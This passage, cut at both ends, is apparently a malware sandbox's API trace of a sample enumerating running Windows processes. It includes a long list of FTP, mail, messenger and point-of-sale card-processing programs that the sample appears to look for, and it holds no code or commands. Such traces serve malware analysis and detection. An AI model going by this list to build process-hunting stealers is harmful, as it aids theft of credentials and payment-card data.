hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.912] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0190.915] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0190.917] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0190.919] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0190.922] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0190.939] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0191.016] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0191.018] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0191.020] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0191.023] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0191.025] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0191.028] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0191.030] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0191.033] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0191.036] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0191.038] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0191.040] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0191.048] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0191.050] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0191.052] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0191.628] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0191.630] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0191.633] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0191.641] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0191.648] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0191.650] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0191.654] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0191.657] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0191.660] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0191.663] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0191.666] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0191.669] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0192.056] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0192.059] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0192.063] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0192.066] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0192.070] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0192.073] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0192.076] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0192.079] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0192.082] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0192.085] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0192.087] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0192.089] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0192.126] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0192.128] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0192.130] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0192.154] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0192.156] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0192.158] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0192.160] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0192.162] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0192.164] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0192.166] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0192.168] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0192.169] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0192.171] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0192.173] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0192.175] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0192.176] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0192.178] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0192.180] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0192.185] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0192.187] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0192.189] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0192.190] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.192] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.194] Process32Next (in: hSnapshot=0xcb4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0192.195] CloseHandle (hObject=0xcb4) returned 1 [0192.195] Sleep (dwMilliseconds=0x64) [0192.313] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18bc [0192.332] Process32First (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.334] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.336] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.339] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.341] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.343] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.345] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.347] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.392] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.395] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.397] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.400] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.402] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.404] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.407] Process32Next (in: hSnapshot=0x18bc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.409] Process32Next (in: 